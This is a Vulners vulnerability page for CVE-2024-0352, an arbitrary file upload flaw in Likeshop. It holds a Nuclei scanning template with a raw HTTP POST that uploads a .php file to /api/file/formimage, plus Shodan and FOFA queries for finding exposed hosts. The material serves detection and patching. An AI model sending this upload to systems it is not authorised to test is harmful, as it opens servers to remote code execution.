Vulners
Lucene search
Likeshop < 2.5.7.20210311 - Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Exploit for Unrestricted Upload of File with Dangerous Type in Likeshop | 12 Jun 202409:46 | – | githubexploit |
 | CVE-2024-0352 | 10 Jan 202400:26 | – | circl |
 | Likeshop Code Issue Vulnerability | 9 Jan 202400:00 | – | cnnvd |
 | CVE-2024-0352 | 9 Jan 202423:00 | – | cve |
 | CVE-2024-0352 Likeshop HTTP POST Request File.php userFormImage unrestricted upload | 9 Jan 202423:00 | – | cvelist |
 | CVE-2024-0352 | 9 Jan 202423:15 | – | nvd |
 | Out-of-bounds | 9 Jan 202423:15 | – | prion |
 | PT-2024-15488 | 9 Jan 202400:00 | – | ptsecurity |
 | CVE-2024-0352 | 4 Feb 202523:01 | – | redhatcve |
 | VulnCheck KEV: CVE-2024-0352 | 22 Jan 202400:00 | – | vulncheck_kev |
10
id: CVE-2024-0352
info:
name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
author: CookieHanHoan,babybash,samuelsamuelsamuel
severity: critical
description: |
A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
impact: |
The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
remediation: Update to the latest version
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-0352
- https://note.zhaoj.in/share/ciwYj7QXC4sZ
- https://vuldb.com/?ctiid.250120
- https://vuldb.com/?id.250120
- https://github.com/tanjiti/sec_profile
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-0352
cwe-id: CWE-434
epss-score: 0.70688
epss-percentile: 0.99311
cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: likeshop
product: likeshop
shodan-query: http.favicon.hash:874152924
fofa-query: icon_hash=874152924
tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive,vkev,vuln
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
POST /api/file/formimage HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="{{filename}}.php"
Content-Type: application/x-php
{{randstr}}
------WebKitFormBoundarygcflwtei--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "\"name\":\"{{filename}}.php\"")'
- 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
condition: and
extractors:
- type: json
part: body
json:
- ".data.url"
# digest: 4b0a00483046022100cf27ce4e572056b621147fee846801edb2cd4513bcc8231b004753163f072ae5022100b4209b46edbef4996b55603f6b11986bff14f67c2c96c2119721b589cad18c06:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.17.3 - 9.8
CVSS 27.5
CVSS 37.3
EPSS0.70688
SSVC